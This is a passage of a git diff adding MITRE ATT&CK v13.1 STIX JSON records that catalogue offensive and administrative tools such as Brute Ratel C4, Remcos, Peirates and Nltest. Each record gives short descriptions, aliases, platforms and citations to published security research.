@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--f86c7f34-c8eb-4ba9-8432-fec3347de592", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ROADTools" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d", + "type": "tool", + "created": "2022-02-18T13:29:23.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0684", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0684" + }, + { + "source_name": "ROADtools Github", + "url": "https://github.com/dirkjanm/ROADtools", + "description": "Dirk-jan Mollema. (2022, January 31). ROADtools. Retrieved January 31, 2022." + } + ], + "modified": "2022-04-01T13:27:48.378Z", + "name": "ROADTools", + "description": "[ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5.json new file mode 100644 index 0000000000000000000000000000000000000000..91f6b3c0d4b94aad2e9d373b6a5bee6d85162a0d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5.json 
@@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--156be571-2633-44f1-a11a-b50432e7bbab", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-17T21:44:03.462Z", + "name": "Brute Ratel C4", + "description": "[Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Sittikorn Sangrattanapitak", + "Daniel Acevedo, @darmad0, ARMADO" + ], + "x_mitre_aliases": [ + "Brute Ratel C4", + "BRc4" + ], + "type": "tool", + "id": "tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5", + "created": "2023-02-07T20:26:58.792Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1063", + "external_id": "S1063" + }, + { + "source_name": "BRc4", + "description": "(Citation: Palo Alto Brute Ratel July 2022)" + }, + { + "source_name": "MDSec Brute Ratel August 2022", + "description": "Chell, D. PART 3: How I Met Your Beacon \u2013 Brute Ratel. 
Retrieved February 6, 2023.", + "url": "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/" + }, + { + "source_name": "Dark Vortex Brute Ratel C4", + "description": "Dark Vortex. (n.d.). A Customized Command and Control Center for Red Team and Adversary Simulation. Retrieved February 7, 2023.", + "url": "https://bruteratel.com/" + }, + { + "source_name": "Palo Alto Brute Ratel July 2022", + "description": "Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.", + "url": "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/" + }, + { + "source_name": "Trend Micro Black Basta October 2022", + "description": "Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html" + }, + { + "source_name": "SANS Brute Ratel October 2022", + "description": "Thomas, W. (2022, October 5). Cracked Brute Ratel C4 framework proliferates across the cybercriminal underground. Retrieved February 6, 2023.", + "url": "https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--79dd477a-8226-4b3d-ad15-28623675f221.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--79dd477a-8226-4b3d-ad15-28623675f221.json new file mode 100644 index 0000000000000000000000000000000000000000..8334f4a79796c9aca7eb4a3b7cc2723b855619d1 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--79dd477a-8226-4b3d-ad15-28623675f221.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--33b9e21c-ed53-49de-822f-8548ff2c8f53", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Peirates" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--79dd477a-8226-4b3d-ad15-28623675f221", + "created": "2022-02-08T16:11:38.528Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0683", + "url": "https://attack.mitre.org/software/S0683" + }, + { + "source_name": "Peirates GitHub", + "url": "https://github.com/inguardians/peirates", + "description": "InGuardians. (2022, January 5). Peirates GitHub. Retrieved February 8, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub)", + "modified": "2022-04-14T20:55:21.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Peirates", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7cd0bc75-055b-4098-a00e-83dc8beaff14.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7cd0bc75-055b-4098-a00e-83dc8beaff14.json new file mode 100644 index 0000000000000000000000000000000000000000..4c9769a59753c56cae162329ceac53ecf5a10fa2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7cd0bc75-055b-4098-a00e-83dc8beaff14.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--021f78d3-72c3-4aa8-bbc9-8c2637757a86", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-23T14:07:20.658Z", + "name": "Remcos", + "description": "[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Remcos" + ], + "type": "tool", + "id": "tool--7cd0bc75-055b-4098-a00e-83dc8beaff14", + "created": "2019-01-29T18:55:20.245Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0332", + "external_id": "S0332" + }, + { + "source_name": "Remcos", + "description": "(Citation: Riskiq Remcos Jan 2018)(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)" + }, + { + "source_name": "Fortinet Remcos Feb 2017", + "description": "Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.", + "url": "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html" + }, + { + "source_name": "Talos Remcos Aug 2018", + "description": "Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.", + "url": "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html" + }, + { + "source_name": "Riskiq Remcos Jan 2018", + "description": "Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. 
Retrieved November 6, 2018.", + "url": "https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1.json new file mode 100644 index 0000000000000000000000000000000000000000..77d33a1e9516ba5971768f9e98c2afb7072c1e0d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--1922b57c-3ebb-40e4-b7d1-0f126cf2571d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-07T13:03:30.781Z", + "name": "Systeminfo", + "description": "[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Systeminfo" + ], + "type": "tool", + "id": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "created": "2017-05-31T21:33:00.969Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0096", + "external_id": "S0096" + }, + { + "source_name": "TechNet Systeminfo", + "description": "Microsoft. (n.d.). Systeminfo. Retrieved April 8, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb491007.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d.json new file mode 100644 index 0000000000000000000000000000000000000000..22e179716bcd552aed4429bce943ebeb5fcbefa2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--0a6cc4ba-8a49-4df1-9af1-d58bf3211ca0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Out1" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d", + "type": "tool", + "created": "2021-03-19T13:11:50.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0594", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0594" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021." + } + ], + "modified": "2021-04-26T22:35:19.315Z", + "name": "Out1", + "description": "[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--842976c7-f9c8-41b2-8371-41dc64fbe261.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--842976c7-f9c8-41b2-8371-41dc64fbe261.json new file mode 100644 index 0000000000000000000000000000000000000000..de91f3f83ee1d8d36e56e05e0c141757c2f81aa3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--842976c7-f9c8-41b2-8371-41dc64fbe261.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--ab742e17-0de5-43cb-9efc-9be3726b33ee", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T13:09:38.786Z", + "name": "ConnectWise", + "description": "[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "ConnectWise", + "ScreenConnect" + ], + "type": "tool", + "id": "tool--842976c7-f9c8-41b2-8371-41dc64fbe261", + "created": "2021-03-18T13:39:27.676Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0591", + "external_id": "S0591" + }, + { + "source_name": "ScreenConnect", + "description": "(Citation: Anomali Static Kitten February 2021)" + }, + { + "source_name": "Anomali Static Kitten February 2021", + "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.", + "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. 
Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9.json new file mode 100644 index 0000000000000000000000000000000000000000..6048437c525367ff3cba6a9567d5c5277a35af41 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--3632d7b3-006d-4999-afc1-b486b3a5433e", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Jose Luis S\u00e1nchez Martinez" + ], + "x_mitre_aliases": [ + "Imminent Monitor" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9", + "type": "tool", + "created": "2020-05-05T18:45:36.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0434", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0434" + }, + { + "source_name": "Imminent Unit42 Dec2019", + "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/", + "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020." + } + ], + "modified": "2020-07-10T13:39:26.417Z", + "name": "Imminent Monitor", + "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38.json new file mode 100644 index 0000000000000000000000000000000000000000..1b7a4dbe1091c30137f1b444ce786a4c3fb5e14a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--8d7531ed-81bb-43e8-8c96-145c579aacaf", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Ruler" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "type": "tool", + "created": "2019-02-04T18:27:00.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0358", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0358" + }, + { + "source_name": "SensePost Ruler GitHub", + "url": "https://github.com/sensepost/ruler", + "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019." + }, + { + "source_name": "SensePost NotRuler", + "url": "https://github.com/sensepost/notruler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019." + } + ], + "modified": "2020-06-22T21:31:54.771Z", + "name": "Ruler", + "description": "[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ec2b22-7061-4469-b539-0989ec4f96c2.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ec2b22-7061-4469-b539-0989ec4f96c2.json new file mode 100644 index 0000000000000000000000000000000000000000..c30c70a8b54049a0ffa212d3e6ffd7ac72360740 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ec2b22-7061-4469-b539-0989ec4f96c2.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--fad7dbc7-fca7-4afc-9265-a9734d347d96", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0193", + "external_id": "S0193" + }, + { + "source_name": "Microsoft Forfiles Aug 2016", + "description": "Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Forfiles", + "description": "[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--96fd6cc4-a693-4118-83ec-619e5352d07d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--96fd6cc4-a693-4118-83ec-619e5352d07d.json new file mode 100644 index 0000000000000000000000000000000000000000..1cd18fe2f450bd41d907cceb6bcbb0b6d4df6417 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--96fd6cc4-a693-4118-83ec-619e5352d07d.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--ba57f615-d36b-421d-806c-f521fb362461", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0191", + "external_id": "S0191" + }, + { + "source_name": "Winexe", + "description": "(Citation: Winexe Github Sept 2013) (Citation: \u00dcberwachung APT28 Forfiles June 2015)" + }, + { + "source_name": "Winexe Github Sept 2013", + "description": "Skalkotos, N. (2013, September 20). WinExe. Retrieved January 22, 2018.", + "url": "https://github.com/skalkoto/winexe/" + }, + { + "source_name": "\u00dcberwachung APT28 Forfiles June 2015", + "description": "Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.", + "url": "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Winexe", + "description": "[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. 
(Citation: \u00dcberwachung APT28 Forfiles June 2015)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--975737f1-b10d-476f-8bda-3ec26ea57172.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--975737f1-b10d-476f-8bda-3ec26ea57172.json new file mode 100644 index 0000000000000000000000000000000000000000..a4ad3267138089b92d2e37ae75cde9586eb50232 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--975737f1-b10d-476f-8bda-3ec26ea57172.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8a83a8cd-b5fb-4123-9ffd-b99a5e5783c9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "MCMD" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "created": "2020-08-13T17:15:25.702Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0500", + "url": "https://attack.mitre.org/software/S0500" + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)", + "modified": "2022-07-29T19:48:28.725Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "MCMD", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf.json new file mode 100644 index 0000000000000000000000000000000000000000..3c51d40ca0d4b31becb774f0776e1fb8f56e3285 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--fc29e52a-25b0-4cdf-8994-269646afd4bb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Nltest" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf", + "type": "tool", + "created": "2019-02-14T17:08:55.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0359", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0359" + }, + { + "source_name": "Nltest Manual", + "url": "https://ss64.com/nt/nltest.html", + "description": "ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019." + } + ], + "modified": "2021-10-07T16:41:18.760Z", + "name": "Nltest", + "description": "[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e.json new 